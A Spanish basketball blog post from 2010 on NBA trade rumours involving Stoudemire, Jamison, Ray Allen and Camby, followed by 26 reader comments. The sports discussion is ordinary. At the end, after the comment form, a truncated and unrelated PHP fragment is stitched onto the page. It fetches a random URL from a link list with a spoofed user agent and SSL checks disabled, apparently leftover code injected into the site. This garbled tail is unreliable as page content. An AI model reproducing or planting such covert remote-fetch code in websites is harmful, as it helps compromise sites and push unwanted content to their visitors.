¿Jamison o Amare?

16 de February de 2010 por Love Denise

Hace un par de días, en el artículo “Desmantelando Washington” comentamos que los Cavs estaban interesados en el ala-pívot Amare Stoudemire, y que a cambio ofreceían a Phoenix al lituano Zydrunas Ilgauskas y al prometedor J. J. Hickson. Pues bien, en las últimas horas, estos contactos entre Cavs y Phoenix se han intensificado y el traspaso podría cerrarse próximamente.

En realidad la principal opción que se manejaba en Cleveland era la de Antawn Jamison puesto que el duo Stoudemire – O´Neal sembró bastantes dudas en Phoenix y además los directivos buscan un 4 con un buen lanzamiento exterior desde el triple, cosa que Stoudemire no puede ofrecer, todo lo contrario que Jamison que esta temporada lleva 58 triples y un aceptable 35%.

Pero no son los únicos interesados en Amare. Philadelphia ha ofrecido a Andre Iguodala y Samuel Dalembert por Amare y Barbosa y los Miami Heat ofrecerían por él a algunos de sus expirings como Quentin Richardson y Udonis Haslem.

Parece que también va a haber movimientos en Boston, donde buscan rejuvenecer el equipo y dotarlo de mayor fondo de armario. Los Celtics planean desprenderse de Ray Allen, y han empezado a preguntar por Andre Iguodala, Kevin Martin y Monta Ellis.

Los Bobcats han preguntado por el veterano Rasheed Wallace, ofreciendo a cambio a Raymond Felton, pero la incógnita sobre el estado físico de Garnett hace que los Celtics en estos momentos no se planteen el dejar salir a Wallace a no ser que se hicieran con los servicios de algún otro hombre alto en un trade paralelo a éste.

Otro rumor es el que involucra a Lakers, Blazers y Bulls. En este supuesto trade, los Lakers se harían con el base Kirk Hinrich, los Blazers con Tyrus Thomas y Sasha Vujacic, y los Bulls con Adam Morrison, Steve Blake o Travis Outlaw y rondas de draft procedentes de Portland.

Otros equipos que buscan salida a algunos jugadores interesante son New York a Nate Robinson y a Al Harrington, los Rockets a McGrady, y los Clippers a Marcus Camby, Al Thornton y Sebastian Telfair.

Comenta

26 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    No me parece nada correcto el trato que le esta dando Boston a Ray Allen, que pronto se han olvidado de todo lo que les ha dado este jugador en 2 años…

      Citar

  2. Chris dice:
    #2

    Parece ser que ya está casi hecho el trade entre los Clippers y Blazers: Camby x Outlaw+Blake. ¿Pondrá Mc Mallon rumbo a LA?

      Citar

  3. Viva_Dirk dice:
    #3

    Es un buen trade para Portland aunque la defensa de Camby los últimos años ha sido mas números que realidad pero con las bajas que tienen les viene muy bien.

    En cuanto a las dudas que ofrece la pareja Shaq-Amare, no creo que sea ningun inconviente en los Cavs donde el ritmo lo marca Lebron. Sería un tremendo refuerzo para los Cavs.

      Citar

  4. Chris dice:
    #4

    Contar con Hinrich sería excelente para los Lakers pero… ¿Quién puede querer cargar con Sasha?

      Citar

  5. pcerezo dice:
    #5

    Creo que Jamison es mejor opción que Stoudamire, aunque está claro que con este refuerzo aumentan exponencialmente las opciones de Cleveland a la espera de ver la química.

    Hinrich sería un muy buen refuerzo para Lakers y entre Outlaw+Blake por Camby, ni frío ni calor.

    Creo que está cantada la reconstrucción de Celtics. La cojera de Garnett es un losa tremenda. Pierce es intraspasable por su peso en el equipo, Garnett está completamente cojo y Rondo es el jugador sobre el que se sustentará la reconstrucción. Solo queda Allen…así es la vida y el negocio. Monta Ellis sería un muy buen fichaje.

    Un saludo,
    Pablo

      Citar

  6. portu dice:
    #6

    Creo q Allen tiene todavía baloncesto para rato, su físico no se ha resentido demasiado y su tiro mucho menos tras tantos años de NBA, pero entiendo q su valor como expiring es lo único de valor q puede ofrecer Boston hoy por hoy. A nivel de proyecto, curiosamente lo q parecía un proyecto de 3 años quizás pueda alargarse un pelín tras el salto positivo q ha dado Rondo, pero eso siempre y cuando KG esté físicamente mejor q estos 2 últimos años. Particularmente no tengo ningún aprecio por Perkins como jugador, me parece bastante pakete y en cualquier otro equipo sería el 8º o 9º en la rotación… quizás tras estos años de titular sería buen momento para venderlo mientras q su rol puede desempeñarlo Sheed perfectamente con la ayuda de Glen Davis.

    En cuanto a los Cavs me uno a los q creen q les iría mejor Jamison.

      Citar

  7. Txusma dice:
    #7

    Yo creo que Amare es medio producto de Nash y habrá que ver como le va jugando lejos del canadiense. Aun así, mejora lo que tienen actualmente los Cavs, así que el salto cualitativo es bastante importante.

      Citar

  8. Viva_Dirk dice:
    #8

    Perkins es el tipo de pivot que encanta en Boston, cumple con su misión a la perfección y ni Wallace ni Davis pueden hacer su trabajo.

      Citar

  9. CAMPO2 dice:
    #9

    En el Trade entre Clippers y Blazers creo que el gran beneficiado sera rudy, que sera la primera opcion de recambio para los hombres exteriores.

    Quninteto:
    Miller, Roy, Webster, Aldrige, Camby

    Banquillo hombre exteriores (seguro que me estoy dejando alguno):
    Rudy, Bayless y Batum

    creo que por calidad y conocimiento del juego deberia ser el 6º hombre

      Citar

  10. Txusma dice:
    #10

    Pues conociendo a McMillan antes que Webster a lo mejor juega Batum que puede ser un auténtico perro de presa. A Webster y Rudy los veo dos jugadores de perfil bastante similar…

      Citar

  11. Kantonyo dice:
    #11

    Si tenemos en cuenta la lesión de Outlaw y que acaba contrato este año, al igual que Blake. Parece una decisión simplemente a corto plazo. Necesitaban un pívot de este estilo si querian aspirar a entrar en PO.

    Camby tiene casi 36 años, pero acaba contrato, por lo que tendrá que dar todo lo que pueda para ganarse un buen contrato. Puede aportar personalidad en este aspecto al equipo.

    Yo estaba hasta el gorro del juego de Travis, y Blake siempre me ha parecido un base sin ideas, totalmente plano.

    Es una pena como la pedazo plantilla que tenían los Blazers el año pasado, se ha quedado en nada, entre lesiones y traspasos. ¿Quién es el culpable? No descartaría más intercambios en Portland antes del límite.

      Citar

  12. pcerezo dice:
    #12

    Lo de los Blazers no pintaba bien y sigo pensando que aunque hubiesen tenido a Oden sano no hubieran llegado más allá de semifinales de conferencia (siendo benévolos). Creo que al final la calidad es la que aflora y es la que hace que un equipo aspire o no. Webster, Prizbilla, Outlaw, Rudy, Batum…son jugadores de segunda fila y no provocan grandes saltos de calidad como para pensar que puederan en dos años superar a Lakers, Denver, Utah….

    Un saludo,
    Pablo

      Citar

  13. CAMPO2 dice:
    #13

    cierto Txusma, por un momento me deje llevar y pensaba que el que entrenaba a los blazers era yo.

    Entonces si blake acaba contrato le guardaran la taquilla en portland para el año que viene

      Citar

  14. sergio dice:
    #14

    Empecemos….

    Lo del Stoudamire a mi no me parece el fichaje mas adecuado. Ya vimos a esta pareja interior en Phoenix y no podemos decir que con grandes resultados. Los dos son grandes intimidadores pero no buenos defensores. En ataque serían un auténtico refuerzo pero creo que el estilo de defensa y correr de los Cavs no se beneficia mucho. LeBron es muy bueno para repartir balones pero no es Nash… Me suena mejor lo de Jamison la verdad. Incluso cuando James actue de base pueden poner en pista a Jamison como alero sin perder defensa interior con Varejao. Amén de que me parece un fallo dejar escapar a Hickson.

    Y por supuesto si fuese el GM de Phoenix aceptaría la oferat de Philly, nunca la de Cavs: mejores jugadores recibidos en el trade y no fortaleces a un posible futuro rival en rondas avanzadas de Playoff.

    En cuanto al traspaso involucrando a Allen lo veo muy normal. Ya no entra en All-Stars, en un jugador de avanzada edad, su aportación ofensiva ya no compensa sus carencias en defensa,…. Lo extraño es que reciba a cambio jugadores como Ellis o Igoudala. Lo más posible sería el trade con Sacramento. Quizás sea el único que convenga a ambos. Lo de Sheed pues lo que vosotros decís… lo veo bastante improbable.

    Aunque no parezca un gran traspaso, el papel de Hinrich en LA puede ser fundamental. Como ya dije me parece uno de los mejores defensores exteriores de la liga, da mucho juego en las posiciones exteriores y no creo esten dando nada a cambio. Si consiguen venderlo por Vujacic y Morrison que nombren a Kupchak empresario del año…. Pero lo dicho, otro trade que me parece improbable.

    Pensando en el que decís que es el fichaje más próximo a concretarse, el que involucra a Portland y Clippers, pues es un gran fichaje para ambos, aunque quizás Portland dé más de lo que reciba… Pero igualmente es un traspaso necesario para suplir las bajas de sus centers titulares. De todas maneras es de los equipos que más efectivos jóvenes e interesantes tiene en su roster… creo que debería moverse.

    Bosh también suena mucho para ser traspasado. Sin embargo, creo que lo más inteligente puede ser mantenerlo a él y vender a Bargnani y/o Turkoglu para ser un equipo con posibilidades de fichar una estrella el verano próximo. Bosh es el mejor pívot ofensivamente de la liga y creo que con cualquiera de los agentes libres haría muy buena pareja: Johnson, Wade, LeBron, Nash,…..

      Citar

  15. sergio dice:
    #15

    y Txus… por supuesto que Amare es en parte consecuencia de Nash. De los jugadores que se han ido marchando de Phoenix siendo “estrellas” como Richardson, Marion, Joe Johnson, tan sólo este último ha seguido siéndolo posteriormente.

      Citar

  16. Dantley2 dice:
    #16

    Veremos que hace al final Cleveland, pero de todos esos quizá el que tiene más implicación a largo plazo es el de los Knicks. Si hacen el que se rumorea, liberarían salario suficiente para conseguir dos contratos máximos, léase LeBron + Wade o LeBron + Bosh o el menos impactante Wade + Bosh

    En el de los Clippers ojito también porque a los Clippers les cabría el salario de LeBron. Un LeBron vs Kobe en L.A. sería un sueño húmedo para Stern

      Citar

  17. Viva_Dirk dice:
    #17

    No considero a Rudy un jugador del mismo perfil que Webster, Rudy es mucho mas completo y lee el juego mucho mejor que Webster, además es un grandísimo defensor.

      Citar

  18. telekoman dice:
    #18

    Uf Dantley, te parece poco impactante un Wade-Bosh. A mi me parecería a la altura de Kobe-Gasol. Vale que el Lebron-Bosh mola más, pero de ahí a poco impactante.

      Citar

  19. Dantley2 dice:
    #19

    Teleko, es por comparación, un Wade-Bosh, unido a que renueven a Lee y a los que mantienen Chandler y Gallinari, más algún base mid-level y algún otro veterano atraído por el equipo se les puede quedar un equipazo. Pero si sustituyes a cualquiera de los dos por LeBron, es aún más equipazo.

      Citar

  20. Vader dice:
    #20

    Juer yo que soy de los Knicks ya firmo cualquiera de las posibilidades con los ojos cerrados… Pero creo que es un sueño imposible. Si Cleveland se hace con Jamison o Amare yo creo que Lebron renovará. Y luego veo más fácil que Bosh se vaya a los Heat a que Wade y Bosh se vayan a New York.

    Algún buen jugador supongo que pillaran los Knicks porque es una franquicia histórica, con un gran mercado y muy necesitada de un jugador franquicia. Pero no creo que sea ninguno de estos tres a menos que uno de ellos lo tengo ya muy claro y sea un secreto a voces entre el resto de jugadores y se produzca un efecto llamada…

      Citar

  21. HeiNeKeN dice:
    #21

    En la pagina de la NBA ya han confirmado el traspaso de Camby x Travis y Blake

      Citar

  22. Love Denise dice:
    #22

    Creo que el trade Outlaw + Blake por Camby es un nuevo acierto del GM de Portland. A éstos les sobraba gente de 1 y de 2, y al tener jugadores muy jóvenes, se estorbaban y estaban frenando su progresión (vease Rudy o Bayless), además les hacia falta como el comer un pivot tras las lesiones de Przybilla y Oden, y dentro de lo que podía encontrar creo que Camby es de lo mejorcito, a pesar de ser viejuno, atrás sigue siendo muy bueno aportando gorros, rebotes e intimidación.

    Yo si fuera el G manager de Lakers, antes que desprenderme de Sasha y Morrison, intentaría desprenderme del paquetazo de Walton. Sasha el año que viene es un expiring de 5 kilos, Morrison creo que acaba contrato este año, y Walton le quedan nada más y nada menso que ¡¡¡¡¡17 millones de dólares por cobrar!!!. Yo es que no me explico que le ve la gente a este hombre, en ataque, no anota, no tiene tiro, no tiene recursos ofensivos, visión de juego normalita, es lentísimo, y su defensa es normalita, tampoco es un perro presa. Total, él día que le firmaron los 36 millones de dólares por 6 años, supongo que Krupchak se había metido algo fuerte por las venas o será que le ha ayudado el hecho de ser el hijo de quién és, quizás si fuera un mexicano llamado Pablo Martinez que vivió su juventud en una chabola no estaría ni en la ACB, porque para mí Walton es un jugador LEB. En relación calidad-salario, lo peor que he visto en Lakers junto a Mark Madsen.

      Citar

  23. Dantley2 dice:
    #23

    La verdad es que viendo el trade de Camby ya confirmado, me he pasado con la posibilidad de LeBron. ¿Para qué va a querer ir a los Clippers si el mensaje enviado ha sido “preferimos ahorrar dinero a cualquier otra cosa”? En realidad Camby era un expiring, creía que no. Siendo así podrían haber sacado muchísimo más. En fin, no se acaba de entender salvo de la perspectiva de ahorrar dinero (el trade además lleva 1.5 millones en cash). Sterling está en su derecho, para eso es suyo el equipo, pero la verdad es que debe haber sido un palo para sus seguidores.

    Al menos veremos si DeAndre Jordan puede evolucionar a ser un Howard salvando las distancias. Al menos en porcentaje de tiros libres le supera, jeje.

      Citar

  24. HeiNeKeN dice:
    #24

    Outlaw y Blake tambien son expiring, asi que creo que eso tambien ha influido en el traspaso

      Citar

  25. Kajie dice:
    #25

    Hombre, para mí un trade Ellis – Allen no estaría nada mal. Aunque sigo pensando que lo que les falta a los Celtics son jugadores de banquillo, rollo Sheed pero en todas las posiciones (sobre todo la de base y la de 3). Ni Williams ni Daniels están ofreciendo demasiado.

    Y a Perkins no me lo toquéis, por favor, es un excelente defensor, intimidador y con una casta tremenda, es muy necesario en estos celtics.

      Citar

  26. Txusma dice:
    #26

    Por algun estraño motivo Kajie, tu comentario aparecía como spam. Si ves que pasa un día entero y tu comentario no aparece, por favor, avísanos enviando un correo.

    Y hablando de Boston, pedías alguien en la posición de base y te han traído a Nate Robinson. No te quejaras, no?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>